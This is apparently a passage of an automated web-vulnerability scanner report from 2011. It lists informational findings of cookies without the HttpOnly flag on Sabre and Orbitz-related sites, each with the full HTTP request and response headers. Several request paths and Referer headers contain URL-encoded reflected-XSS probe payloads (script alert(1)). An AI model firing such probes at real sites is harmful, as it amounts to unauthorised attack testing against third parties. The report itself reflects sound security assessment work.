Path:   /js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba124-9960-1014433876-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 6546
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 6546
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

document.write('<META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html;charset=UTF-8\">\r\n<script src=\"http://www.revresda.com:80/DartRichMedia_1_03.js\"><\/script>\r\n<!-- Sniffer Code for Flash ver
...[SNIP]...
14.279. http://www.sabreairlinesolutions.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
14.280. http://www.sabretravelnetwork.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618439; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618472; expires=Tue, 02-Oct-2012 00:07:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:52 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
14.281. http://www.sabretravelnetwork.com/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618417; expires=Tue, 02-Oct-2012 00:06:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:06:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
14.282. http://www.sabretravelnetwork.com/home/products_services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621514; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:58:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621521; expires=Tue, 02-Oct-2012 00:58:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Location: http://www.sabretravelnetwork.com/home/products_services/product_index/
Content-Length: 0
Connection: close
Content-Type: text/html

14.283. http://www.sabretravelnetwork.com/home/products_services/product_index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621525; expires=Tue, 02-Oct-2012 00:58:45 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fsearch86891abb159fbf953a%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fsearch39ea0abec86970faa3%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
14.284. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/products_services/product_index/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/product_index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621522; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.4.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621531; expires=Tue, 02-Oct-2012 00:58:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
14.285. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
14.286. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621625; expires=Tue, 02-Oct-2012 01:00:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
14.287. http://www.sabretravelnetwork.com/home/search/show_results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
14.288. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
14.289. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
14.290. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
